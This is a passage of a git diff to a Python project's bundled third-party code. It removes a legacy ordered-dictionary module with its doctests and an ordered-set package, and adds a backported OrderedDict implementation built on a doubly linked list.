``OrderedDict.items`` method, but also - supports indexing and sequence methods. - """ - - def __init__(self, main): - self._main = main - - def __call__(self): - """Pretend to be the items method.""" - return self._main._items() - - def __getitem__(self, index): - """Fetch the item at position i.""" - if isinstance(index, types.SliceType): - # fetching a slice returns an OrderedDict - return self._main[index].items() - key = self._main._sequence[index] - return (key, self._main[key]) - - def __setitem__(self, index, item): - """Set item at position i to item.""" - if isinstance(index, types.SliceType): - # NOTE: item must be an iterable (list of tuples) - self._main[index] = OrderedDict(item) - else: - # FIXME: Does this raise a sensible error? - orig = self._main.keys[index] - key, value = item - if self._main.strict and key in self and (key != orig): - raise ValueError('slice assignment must be from ' - 'unique keys') - # delete the current one - del self._main[self._main._sequence[index]] - self._main.insert(index, key, value) - - def __delitem__(self, i): - """Delete the item at position i.""" - key = self._main._sequence[i] - if isinstance(i, types.SliceType): - for k in key: - # FIXME: efficiency? - del self._main[k] - else: - del self._main[key] - - ### following methods pinched from UserList and adapted ### - def __repr__(self): return repr(self._main.items()) - - # FIXME: do we need to check if we are comparing with another ``Items`` - # object? 
(like the __cast method of UserList) - def __lt__(self, other): return self._main.items() < other - def __le__(self, other): return self._main.items() <= other - def __eq__(self, other): return self._main.items() == other - def __ne__(self, other): return self._main.items() != other - def __gt__(self, other): return self._main.items() > other - def __ge__(self, other): return self._main.items() >= other - def __cmp__(self, other): return cmp(self._main.items(), other) - - def __contains__(self, item): return item in self._main.items() - def __len__(self): return len(self._main._sequence) # easier :-) - def __iter__(self): return self._main.iteritems() - def count(self, item): return self._main.items().count(item) - def index(self, item, *args): return self._main.items().index(item, *args) - def reverse(self): self._main.reverse() - def sort(self, *args, **kwds): self._main.sort(*args, **kwds) - def __mul__(self, n): return self._main.items()*n - __rmul__ = __mul__ - def __add__(self, other): return self._main.items() + other - def __radd__(self, other): return other + self._main.items() - - def append(self, item): - """Add an item to the end.""" - # FIXME: this is only append if the key isn't already present - key, value = item - self._main[key] = value - - def insert(self, i, item): - key, value = item - self._main.insert(i, key, value) - - def pop(self, i=-1): - key = self._main._sequence[i] - return (key, self._main.pop(key)) - - def remove(self, item): - key, value = item - try: - assert value == self._main[key] - except (KeyError, AssertionError): - raise ValueError('ValueError: list.remove(x): x not in list') - else: - del self._main[key] - - def extend(self, other): - # FIXME: is only a true extend if none of the keys already present - for item in other: - key, value = item - self._main[key] = value - - def __iadd__(self, other): - self.extend(other) - - ## following methods not implemented for items ## - - def __imul__(self, n): raise TypeError('Can\'t multiply items in place') - -class Values(object): - """ - Custom object for accessing the values of an OrderedDict. - - Can be called like the normal ``OrderedDict.values`` method, but also - supports indexing and sequence methods. - """ - - def __init__(self, main): - self._main = main - - def __call__(self): - """Pretend to be the values method.""" - return self._main._values() - - def __getitem__(self, index): - """Fetch the value at position i.""" - if isinstance(index, types.SliceType): - return [self._main[key] for key in self._main._sequence[index]] - else: - return self._main[self._main._sequence[index]] - - def __setitem__(self, index, value): - """ - Set the value at position i to value. - - You can only do slice assignment to values if you supply a sequence of - equal length to the slice you are replacing. - """ - if isinstance(index, types.SliceType): - keys = self._main._sequence[index] - if len(keys) != len(value): - raise ValueError('attempt to assign sequence of size %s ' - 'to slice of size %s' % (len(name), len(keys))) - # FIXME: efficiency? 
Would be better to calculate the indexes - # directly from the slice object - # NOTE: the new keys can collide with existing keys (or even - # contain duplicates) - these will overwrite - for key, val in zip(keys, value): - self._main[key] = val - else: - self._main[self._main._sequence[index]] = value - - ### following methods pinched from UserList and adapted ### - def __repr__(self): return repr(self._main.values()) - - # FIXME: do we need to check if we are comparing with another ``Values`` - # object? (like the __cast method of UserList) - def __lt__(self, other): return self._main.values() < other - def __le__(self, other): return self._main.values() <= other - def __eq__(self, other): return self._main.values() == other - def __ne__(self, other): return self._main.values() != other - def __gt__(self, other): return self._main.values() > other - def __ge__(self, other): return self._main.values() >= other - def __cmp__(self, other): return cmp(self._main.values(), other) - - def __contains__(self, item): return item in self._main.values() - def __len__(self): return len(self._main._sequence) # easier :-) - def __iter__(self): return self._main.itervalues() - def count(self, item): return self._main.values().count(item) - def index(self, item, *args): return self._main.values().index(item, *args) - - def reverse(self): - """Reverse the values""" - vals = self._main.values() - vals.reverse() - # FIXME: efficiency - self[:] = vals - - def sort(self, *args, **kwds): - """Sort the values.""" - vals = self._main.values() - vals.sort(*args, **kwds) - self[:] = vals - - def __mul__(self, n): return self._main.values()*n - __rmul__ = __mul__ - def __add__(self, other): return self._main.values() + other - def __radd__(self, other): return other + self._main.values() - - ## following methods not implemented for values ## - def __delitem__(self, i): raise TypeError('Can\'t delete items from values') - def __iadd__(self, other): raise TypeError('Can\'t add in place to values') - def __imul__(self, n): raise TypeError('Can\'t multiply values in place') - def append(self, item): raise TypeError('Can\'t append items to values') - def insert(self, i, item): raise TypeError('Can\'t insert items into values') - def pop(self, i=-1): raise TypeError('Can\'t pop items from values') - def remove(self, item): raise TypeError('Can\'t remove items from values') - def extend(self, other): raise TypeError('Can\'t extend values') - -class SequenceOrderedDict(OrderedDict): - """ - Experimental version of OrderedDict that has a custom object for ``keys``, - ``values``, and ``items``. - - These are callable sequence objects that work as methods, or can be - manipulated directly as sequences. - - Test for ``keys``, ``items`` and ``values``. 
- - >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) - >>> d - SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> d.keys - [1, 2, 3] - >>> d.keys() - [1, 2, 3] - >>> d.setkeys((3, 2, 1)) - >>> d - SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) - >>> d.setkeys((1, 2, 3)) - >>> d.keys[0] - 1 - >>> d.keys[:] - [1, 2, 3] - >>> d.keys[-1] - 3 - >>> d.keys[-2] - 2 - >>> d.keys[0:2] = [2, 1] - >>> d - SequenceOrderedDict([(2, 3), (1, 2), (3, 4)]) - >>> d.keys.reverse() - >>> d.keys - [3, 1, 2] - >>> d.keys = [1, 2, 3] - >>> d - SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> d.keys = [3, 1, 2] - >>> d - SequenceOrderedDict([(3, 4), (1, 2), (2, 3)]) - >>> a = SequenceOrderedDict() - >>> b = SequenceOrderedDict() - >>> a.keys == b.keys - 1 - >>> a['a'] = 3 - >>> a.keys == b.keys - 0 - >>> b['a'] = 3 - >>> a.keys == b.keys - 1 - >>> b['b'] = 3 - >>> a.keys == b.keys - 0 - >>> a.keys > b.keys - 0 - >>> a.keys < b.keys - 1 - >>> 'a' in a.keys - 1 - >>> len(b.keys) - 2 - >>> 'c' in d.keys - 0 - >>> 1 in d.keys - 1 - >>> [v for v in d.keys] - [3, 1, 2] - >>> d.keys.sort() - >>> d.keys - [1, 2, 3] - >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)), strict=True) - >>> d.keys[::-1] = [1, 2, 3] - >>> d - SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) - >>> d.keys[:2] - [3, 2] - >>> d.keys[:2] = [1, 3] - Traceback (most recent call last): - KeyError: 'Keylist is not the same as current keylist.' - - >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) - >>> d - SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> d.values - [2, 3, 4] - >>> d.values() - [2, 3, 4] - >>> d.setvalues((4, 3, 2)) - >>> d - SequenceOrderedDict([(1, 4), (2, 3), (3, 2)]) - >>> d.values[::-1] - [2, 3, 4] - >>> d.values[0] - 4 - >>> d.values[-2] - 3 - >>> del d.values[0] - Traceback (most recent call last): - TypeError: Can't delete items from values - >>> d.values[::2] = [2, 4] - >>> d - SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> 7 in d.values - 0 - >>> len(d.values) - 3 - >>> [val for val in d.values] - [2, 3, 4] - >>> d.values[-1] = 2 - >>> d.values.count(2) - 2 - >>> d.values.index(2) - 0 - >>> d.values[-1] = 7 - >>> d.values - [2, 3, 7] - >>> d.values.reverse() - >>> d.values - [7, 3, 2] - >>> d.values.sort() - >>> d.values - [2, 3, 7] - >>> d.values.append('anything') - Traceback (most recent call last): - TypeError: Can't append items to values - >>> d.values = (1, 2, 3) - >>> d - SequenceOrderedDict([(1, 1), (2, 2), (3, 3)]) - - >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) - >>> d - SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> d.items() - [(1, 2), (2, 3), (3, 4)] - >>> d.setitems([(3, 4), (2 ,3), (1, 2)]) - >>> d - SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) - >>> d.items[0] - (3, 4) - >>> d.items[:-1] - [(3, 4), (2, 3)] - >>> d.items[1] = (6, 3) - >>> d.items - [(3, 4), (6, 3), (1, 2)] - >>> d.items[1:2] = [(9, 9)] - >>> d - SequenceOrderedDict([(3, 4), (9, 9), (1, 2)]) - >>> del d.items[1:2] - >>> d - SequenceOrderedDict([(3, 4), (1, 2)]) - >>> (3, 4) in d.items - 1 - >>> (4, 3) in d.items - 0 - >>> len(d.items) - 2 - >>> [v for v in d.items] - [(3, 4), (1, 2)] - >>> d.items.count((3, 4)) - 1 - >>> d.items.index((1, 2)) - 1 - >>> d.items.index((2, 1)) - Traceback (most recent call last): - ValueError: list.index(x): x not in list - >>> d.items.reverse() - >>> d.items - [(1, 2), (3, 4)] - >>> d.items.reverse() - >>> d.items.sort() - >>> d.items - [(1, 2), (3, 4)] - >>> d.items.append((5, 6)) - >>> d.items - [(1, 2), (3, 4), (5, 6)] - >>> d.items.insert(0, (0, 0)) - >>> d.items - [(0, 0), 
(1, 2), (3, 4), (5, 6)] - >>> d.items.insert(-1, (7, 8)) - >>> d.items - [(0, 0), (1, 2), (3, 4), (7, 8), (5, 6)] - >>> d.items.pop() - (5, 6) - >>> d.items - [(0, 0), (1, 2), (3, 4), (7, 8)] - >>> d.items.remove((1, 2)) - >>> d.items - [(0, 0), (3, 4), (7, 8)] - >>> d.items.extend([(1, 2), (5, 6)]) - >>> d.items - [(0, 0), (3, 4), (7, 8), (1, 2), (5, 6)] - """ - - def __init__(self, init_val=(), strict=True): - OrderedDict.__init__(self, init_val, strict=strict) - self._keys = self.keys - self._values = self.values - self._items = self.items - self.keys = Keys(self) - self.values = Values(self) - self.items = Items(self) - self._att_dict = { - 'keys': self.setkeys, - 'items': self.setitems, - 'values': self.setvalues, - } - - def __setattr__(self, name, value): - """Protect keys, items, and values.""" - if not '_att_dict' in self.__dict__: - object.__setattr__(self, name, value) - else: - try: - fun = self._att_dict[name] - except KeyError: - OrderedDict.__setattr__(self, name, value) - else: - fun(value) - -if __name__ == '__main__': - if INTP_VER < (2, 3): - raise RuntimeError("Tests require Python v.2.3 or later") - # turn off warnings for tests - warnings.filterwarnings('ignore') - # run the code tests in doctest format - import doctest - m = sys.modules.get('__main__') - globs = m.__dict__.copy() - globs.update({ - 'INTP_VER': INTP_VER, - }) - doctest.testmod(m, globs=globs) - diff --git a/thirdparty/odict/ordereddict.py b/thirdparty/odict/ordereddict.py new file mode 100644 index 00000000000..1cdd6f46edc --- /dev/null +++ b/thirdparty/odict/ordereddict.py @@ -0,0 +1,133 @@ +# Copyright (c) 2009 Raymond Hettinger +# +# Permission is hereby granted, free of charge, to any person +# obtaining a copy of this software and associated documentation files +# (the "Software"), to deal in the Software without restriction, +# including without limitation the rights to use, copy, modify, merge, +# publish, distribute, sublicense, and/or sell copies of the Software, +# and to permit persons to whom the Software is furnished to do so, +# subject to the following conditions: +# +# The above copyright notice and this permission notice shall be +# included in all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES +# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +# OTHER DEALINGS IN THE SOFTWARE. 
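For orientation, the replacement OrderedDict added below (thirdparty/odict/ordereddict.py, Raymond Hettinger's backport per the copyright header above) keeps key order in a sentinel-based doubly linked list plus a key-to-node map, so inserts and deletes stay O(1) and iteration is O(n) with no list scanning. A hedged usage sketch follows; it assumes the repository root is on sys.path so the new module imports under the path shown, and it is illustration only, not part of the patch:

# Usage sketch of the backported OrderedDict added below (assumed import path).
from thirdparty.odict.ordereddict import OrderedDict

d = OrderedDict()
d['b'] = 1
d['a'] = 2
d['c'] = 3
print(list(d))                # ['b', 'a', 'c'] - insertion order is preserved
print(d.popitem())            # ('c', 3) - pops the most recently added pair
print(d.popitem(last=False))  # ('b', 1) - or the oldest one
# Equality against another OrderedDict is order-sensitive:
print(OrderedDict([('a', 1), ('b', 2)]) == OrderedDict([('b', 2), ('a', 1)]))  # False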
+ +try: + from UserDict import DictMixin +except ImportError: + try: + from collections.abc import MutableMapping as DictMixin + except ImportError: + from collections import MutableMapping as DictMixin + +class OrderedDict(dict, DictMixin): + + def __init__(self, *args, **kwds): + if len(args) > 1: + raise TypeError('expected at most 1 arguments, got %d' % len(args)) + try: + self.__end + except AttributeError: + self.clear() + self.update(*args, **kwds) + + def clear(self): + self.__end = end = [] + end += [None, end, end] # sentinel node for doubly linked list + self.__map = {} # key --> [key, prev, next] + dict.clear(self) + + def __setitem__(self, key, value): + if key not in self: + end = self.__end + curr = end[1] + curr[2] = end[1] = self.__map[key] = [key, curr, end] + dict.__setitem__(self, key, value) + + def __delitem__(self, key): + dict.__delitem__(self, key) + key, prev, next = self.__map.pop(key) + prev[2] = next + next[1] = prev + + def __iter__(self): + end = self.__end + curr = end[2] + while curr is not end: + yield curr[0] + curr = curr[2] + + def __reversed__(self): + end = self.__end + curr = end[1] + while curr is not end: + yield curr[0] + curr = curr[1] + + def popitem(self, last=True): + if not self: + raise KeyError('dictionary is empty') + if last: + key = next(reversed(self)) + else: + key = next(iter(self)) + value = self.pop(key) + return key, value + + def __reduce__(self): + items = [[k, self[k]] for k in self] + tmp = self.__map, self.__end + del self.__map, self.__end + inst_dict = vars(self).copy() + self.__map, self.__end = tmp + if inst_dict: + return (self.__class__, (items,), inst_dict) + return self.__class__, (items,) + + def keys(self): + return list(self) + + setdefault = DictMixin.setdefault + update = DictMixin.update + pop = DictMixin.pop + values = DictMixin.values + items = DictMixin.items + iterkeys = DictMixin.iterkeys + itervalues = DictMixin.itervalues + iteritems = DictMixin.iteritems + + def __repr__(self): + if not self: + return '%s()' % (self.__class__.__name__,) + return '%s(%r)' % (self.__class__.__name__, list(self.items())) + + def copy(self): + return self.__class__(self) + + @classmethod + def fromkeys(cls, iterable, value=None): + d = cls() + for key in iterable: + d[key] = value + return d + + def __eq__(self, other): + if isinstance(other, OrderedDict): + if len(self) != len(other): + return False + for p, q in zip(self.items(), other.items()): + if p != q: + return False + return True + return dict.__eq__(self, other) + + def __ne__(self, other): + return not self == other diff --git a/thirdparty/oset/LICENSE.txt b/thirdparty/oset/LICENSE.txt deleted file mode 100644 index aef85dda33c..00000000000 --- a/thirdparty/oset/LICENSE.txt +++ /dev/null @@ -1,29 +0,0 @@ -License -======= - -Copyright (c) 2009, Raymond Hettinger, and others -All rights reserved. - -Package structured based on the one developed to odict -Copyright (c) 2010, BlueDynamics Alliance, Austria - - -* Redistributions of source code must retain the above copyright notice, this - list of conditions and the following disclaimer. -* Redistributions in binary form must reproduce the above copyright notice, this - list of conditions and the following disclaimer in the documentation and/or - other materials provided with the distribution. -* Neither the name of the BlueDynamics Alliance nor the names of its - contributors may be used to endorse or promote products derived from this - software without specific prior written permission. 
- -THIS SOFTWARE IS PROVIDED BY BlueDynamics Alliance ``AS IS`` AND ANY -EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL BlueDynamics Alliance BE LIABLE FOR ANY -DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/thirdparty/oset/__init__.py b/thirdparty/oset/__init__.py deleted file mode 100644 index 688b31e9230..00000000000 --- a/thirdparty/oset/__init__.py +++ /dev/null @@ -1,3 +0,0 @@ -"""Main Ordered Set module """ - -from pyoset import oset diff --git a/thirdparty/oset/_abc.py b/thirdparty/oset/_abc.py deleted file mode 100644 index d3cf1b51ef1..00000000000 --- a/thirdparty/oset/_abc.py +++ /dev/null @@ -1,476 +0,0 @@ -#!/usr/bin/env python -# -*- mode:python; tab-width: 2; coding: utf-8 -*- - -"""Partially backported python ABC classes""" - -from __future__ import absolute_import - -import sys -import types - -if sys.version_info > (2, 6): - raise ImportError("Use native ABC classes istead of this one.") - - -# Instance of old-style class -class _C: - pass - -_InstanceType = type(_C()) - - -def abstractmethod(funcobj): - """A decorator indicating abstract methods. - - Requires that the metaclass is ABCMeta or derived from it. A - class that has a metaclass derived from ABCMeta cannot be - instantiated unless all of its abstract methods are overridden. - The abstract methods can be called using any of the normal - 'super' call mechanisms. - - Usage: - - class C: - __metaclass__ = ABCMeta - @abstractmethod - def my_abstract_method(self, ...): - ... - """ - funcobj.__isabstractmethod__ = True - return funcobj - - -class ABCMeta(type): - - """Metaclass for defining Abstract Base Classes (ABCs). - - Use this metaclass to create an ABC. An ABC can be subclassed - directly, and then acts as a mix-in class. You can also register - unrelated concrete classes (even built-in classes) and unrelated - ABCs as 'virtual subclasses' -- these and their descendants will - be considered subclasses of the registering ABC by the built-in - issubclass() function, but the registering ABC won't show up in - their MRO (Method Resolution Order) nor will method - implementations defined by the registering ABC be callable (not - even via super()). - - """ - - # A global counter that is incremented each time a class is - # registered as a virtual subclass of anything. It forces the - # negative cache to be cleared before its next use. 
- _abc_invalidation_counter = 0 - - def __new__(mcls, name, bases, namespace): - cls = super(ABCMeta, mcls).__new__(mcls, name, bases, namespace) - # Compute set of abstract method names - abstracts = set(name - for name, value in namespace.items() - if getattr(value, "__isabstractmethod__", False)) - for base in bases: - for name in getattr(base, "__abstractmethods__", set()): - value = getattr(cls, name, None) - if getattr(value, "__isabstractmethod__", False): - abstracts.add(name) - cls.__abstractmethods__ = frozenset(abstracts) - # Set up inheritance registry - cls._abc_registry = set() - cls._abc_cache = set() - cls._abc_negative_cache = set() - cls._abc_negative_cache_version = ABCMeta._abc_invalidation_counter - return cls - - def register(cls, subclass): - """Register a virtual subclass of an ABC.""" - if not isinstance(subclass, (type, types.ClassType)): - raise TypeError("Can only register classes") - if issubclass(subclass, cls): - return # Already a subclass - # Subtle: test for cycles *after* testing for "already a subclass"; - # this means we allow X.register(X) and interpret it as a no-op. - if issubclass(cls, subclass): - # This would create a cycle, which is bad for the algorithm below - raise RuntimeError("Refusing to create an inheritance cycle") - cls._abc_registry.add(subclass) - ABCMeta._abc_invalidation_counter += 1 # Invalidate negative cache - - def _dump_registry(cls, file=None): - """Debug helper to print the ABC registry.""" - print >> file, "Class: %s.%s" % (cls.__module__, cls.__name__) - print >> file, "Inv.counter: %s" % ABCMeta._abc_invalidation_counter - for name in sorted(cls.__dict__.keys()): - if name.startswith("_abc_"): - value = getattr(cls, name) - print >> file, "%s: %r" % (name, value) - - def __instancecheck__(cls, instance): - """Override for isinstance(instance, cls).""" - # Inline the cache checking when it's simple. - subclass = getattr(instance, '__class__', None) - if subclass in cls._abc_cache: - return True - subtype = type(instance) - # Old-style instances - if subtype is _InstanceType: - subtype = subclass - if subtype is subclass or subclass is None: - if (cls._abc_negative_cache_version == - ABCMeta._abc_invalidation_counter and - subtype in cls._abc_negative_cache): - return False - # Fall back to the subclass check. 
- return cls.__subclasscheck__(subtype) - return (cls.__subclasscheck__(subclass) or - cls.__subclasscheck__(subtype)) - - def __subclasscheck__(cls, subclass): - """Override for issubclass(subclass, cls).""" - # Check cache - if subclass in cls._abc_cache: - return True - # Check negative cache; may have to invalidate - if cls._abc_negative_cache_version < ABCMeta._abc_invalidation_counter: - # Invalidate the negative cache - cls._abc_negative_cache = set() - cls._abc_negative_cache_version = ABCMeta._abc_invalidation_counter - elif subclass in cls._abc_negative_cache: - return False - # Check the subclass hook - ok = cls.__subclasshook__(subclass) - if ok is not NotImplemented: - assert isinstance(ok, bool) - if ok: - cls._abc_cache.add(subclass) - else: - cls._abc_negative_cache.add(subclass) - return ok - # Check if it's a direct subclass - if cls in getattr(subclass, '__mro__', ()): - cls._abc_cache.add(subclass) - return True - # Check if it's a subclass of a registered class (recursive) - for rcls in cls._abc_registry: - if issubclass(subclass, rcls): - cls._abc_cache.add(subclass) - return True - # Check if it's a subclass of a subclass (recursive) - for scls in cls.__subclasses__(): - if issubclass(subclass, scls): - cls._abc_cache.add(subclass) - return True - # No dice; update negative cache - cls._abc_negative_cache.add(subclass) - return False - - -def _hasattr(C, attr): - try: - return any(attr in B.__dict__ for B in C.__mro__) - except AttributeError: - # Old-style class - return hasattr(C, attr) - - -class Sized: - __metaclass__ = ABCMeta - - @abstractmethod - def __len__(self): - return 0 - - @classmethod - def __subclasshook__(cls, C): - if cls is Sized: - if _hasattr(C, "__len__"): - return True - return NotImplemented - - -class Container: - __metaclass__ = ABCMeta - - @abstractmethod - def __contains__(self, x): - return False - - @classmethod - def __subclasshook__(cls, C): - if cls is Container: - if _hasattr(C, "__contains__"): - return True - return NotImplemented - - -class Iterable: - __metaclass__ = ABCMeta - - @abstractmethod - def __iter__(self): - while False: - yield None - - @classmethod - def __subclasshook__(cls, C): - if cls is Iterable: - if _hasattr(C, "__iter__"): - return True - return NotImplemented - -Iterable.register(str) - - -class Set(Sized, Iterable, Container): - """A set is a finite, iterable container. - - This class provides concrete generic implementations of all - methods except for __contains__, __iter__ and __len__. - - To override the comparisons (presumably for speed, as the - semantics are fixed), all you have to do is redefine __le__ and - then the other operations will automatically follow suit. 
- """ - - def __le__(self, other): - if not isinstance(other, Set): - return NotImplemented - if len(self) > len(other): - return False - for elem in self: - if elem not in other: - return False - return True - - def __lt__(self, other): - if not isinstance(other, Set): - return NotImplemented - return len(self) < len(other) and self.__le__(other) - - def __gt__(self, other): - if not isinstance(other, Set): - return NotImplemented - return other < self - - def __ge__(self, other): - if not isinstance(other, Set): - return NotImplemented - return other <= self - - def __eq__(self, other): - if not isinstance(other, Set): - return NotImplemented - return len(self) == len(other) and self.__le__(other) - - def __ne__(self, other): - return not (self == other) - - @classmethod - def _from_iterable(cls, it): - '''Construct an instance of the class from any iterable input. - - Must override this method if the class constructor signature - does not accept an iterable for an input. - ''' - return cls(it) - - def __and__(self, other): - if not isinstance(other, Iterable): - return NotImplemented - return self._from_iterable(value for value in other if value in self) - - def isdisjoint(self, other): - for value in other: - if value in self: - return False - return True - - def __or__(self, other): - if not isinstance(other, Iterable): - return NotImplemented - chain = (e for s in (self, other) for e in s) - return self._from_iterable(chain) - - def __sub__(self, other): - if not isinstance(other, Set): - if not isinstance(other, Iterable): - return NotImplemented - other = self._from_iterable(other) - return self._from_iterable(value for value in self - if value not in other) - - def __xor__(self, other): - if not isinstance(other, Set): - if not isinstance(other, Iterable): - return NotImplemented - other = self._from_iterable(other) - return (self - other) | (other - self) - - # Sets are not hashable by default, but subclasses can change this - __hash__ = None - - def _hash(self): - """Compute the hash value of a set. - - Note that we don't define __hash__: not all sets are hashable. - But if you define a hashable set type, its __hash__ should - call this function. - - This must be compatible __eq__. - - All sets ought to compare equal if they contain the same - elements, regardless of how they are implemented, and - regardless of the order of the elements; so there's not much - freedom for __eq__ or __hash__. We match the algorithm used - by the built-in frozenset type. - """ - MAX = sys.maxint - MASK = 2 * MAX + 1 - n = len(self) - h = 1927868237 * (n + 1) - h &= MASK - for x in self: - hx = hash(x) - h ^= (hx ^ (hx << 16) ^ 89869747) * 3644798167 - h &= MASK - h = h * 69069 + 907133923 - h &= MASK - if h > MAX: - h -= MASK + 1 - if h == -1: - h = 590923713 - return h - -Set.register(frozenset) - - -class MutableSet(Set): - - @abstractmethod - def add(self, value): - """Add an element.""" - raise NotImplementedError - - @abstractmethod - def discard(self, value): - """Remove an element. Do not raise an exception if absent.""" - raise NotImplementedError - - def remove(self, value): - """Remove an element. If not a member, raise a KeyError.""" - if value not in self: - raise KeyError(value) - self.discard(value) - - def pop(self): - """Return the popped value. Raise KeyError if empty.""" - it = iter(self) - try: - value = it.next() - except StopIteration: - raise KeyError - self.discard(value) - return value - - def clear(self): - """This is slow (creates N new iterators!) 
but effective.""" - try: - while True: - self.pop() - except KeyError: - pass - - def __ior__(self, it): - for value in it: - self.add(value) - return self - - def __iand__(self, it): - for value in (self - it): - self.discard(value) - return self - - def __ixor__(self, it): - if not isinstance(it, Set): - it = self._from_iterable(it) - for value in it: - if value in self: - self.discard(value) - else: - self.add(value) - return self - - def __isub__(self, it): - for value in it: - self.discard(value) - return self - -MutableSet.register(set) - - -class OrderedSet(MutableSet): - - def __init__(self, iterable=None): - self.end = end = [] - end += [None, end, end] # sentinel node for doubly linked list - self.map = {} # key --> [key, prev, next] - if iterable is not None: - self |= iterable - - def __len__(self): - return len(self.map) - - def __contains__(self, key): - return key in self.map - - def __getitem__(self, key): - return list(self)[key] - - def add(self, key): - if key not in self.map: - end = self.end - curr = end[PREV] - curr[NEXT] = end[PREV] = self.map[key] = [key, curr, end] - - def discard(self, key): - if key in self.map: - key, prev, next = self.map.pop(key) - prev[NEXT] = next - next[PREV] = prev - - def __iter__(self): - end = self.end - curr = end[NEXT] - while curr is not end: - yield curr[KEY] - curr = curr[NEXT] - - def __reversed__(self): - end = self.end - curr = end[PREV] - while curr is not end: - yield curr[KEY] - curr = curr[PREV] - - def pop(self, last=True): - if not self: - raise KeyError('set is empty') - key = reversed(self).next() if last else iter(self).next() - self.discard(key) - return key - - def __repr__(self): - if not self: - return '%s()' % (self.__class__.__name__,) - return '%s(%r)' % (self.__class__.__name__, list(self)) - - def __eq__(self, other): - if isinstance(other, OrderedSet): - return len(self) == len(other) and list(self) == list(other) - return set(self) == set(other) - - def __del__(self): - if all([KEY, PREV, NEXT]): - self.clear() # remove circular references - -if __name__ == '__main__': - print(OrderedSet('abracadaba')) - print(OrderedSet('simsalabim')) diff --git a/thirdparty/oset/pyoset.py b/thirdparty/oset/pyoset.py deleted file mode 100644 index 2a67455bc22..00000000000 --- a/thirdparty/oset/pyoset.py +++ /dev/null @@ -1,83 +0,0 @@ -#!/usr/bin/env python -# -*- mode:python; tab-width: 2; coding: utf-8 -*- - -"""Partially backported python ABC classes""" - -from __future__ import absolute_import - -try: - from collections import MutableSet -except ImportError: - # Running in Python <= 2.5 - from ._abc import MutableSet - - -KEY, PREV, NEXT = range(3) - - -class OrderedSet(MutableSet): - - def __init__(self, iterable=None): - self.end = end = [] - end += [None, end, end] # sentinel node for doubly linked list - self.map = {} # key --> [key, prev, next] - if iterable is not None: - self |= iterable - - def __len__(self): - return len(self.map) - - def __contains__(self, key): - return key in self.map - - def __getitem__(self, key): - return list(self)[key] - - def add(self, key): - if key not in self.map: - end = self.end - curr = end[PREV] - curr[NEXT] = end[PREV] = self.map[key] = [key, curr, end] - - def discard(self, key): - if key in self.map: - key, prev, next = self.map.pop(key) - prev[NEXT] = next - next[PREV] = prev - - def __iter__(self): - end = self.end - curr = end[NEXT] - while curr is not end: - yield curr[KEY] - curr = curr[NEXT] - - def __reversed__(self): - end = self.end - curr = end[PREV] - while curr is 
not end: - yield curr[KEY] - curr = curr[PREV] - - def pop(self, last=True): - if not self: - raise KeyError('set is empty') - key = reversed(self).next() if last else iter(self).next() - self.discard(key) - return key - - def __repr__(self): - if not self: - return '%s()' % (self.__class__.__name__,) - return '%s(%r)' % (self.__class__.__name__, list(self)) - - def __eq__(self, other): - if isinstance(other, OrderedSet): - return len(self) == len(other) and list(self) == list(other) - return set(self) == set(other) - - def __del__(self): - if all([KEY, PREV, NEXT]): - self.clear() # remove circular references - -oset = OrderedSet diff --git a/thirdparty/pagerank/__init__.py b/thirdparty/pagerank/__init__.py deleted file mode 100644 index 67837734347..00000000000 --- a/thirdparty/pagerank/__init__.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python -# -# The MIT License -# -# Copyright 2010 Corey Goldberg -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 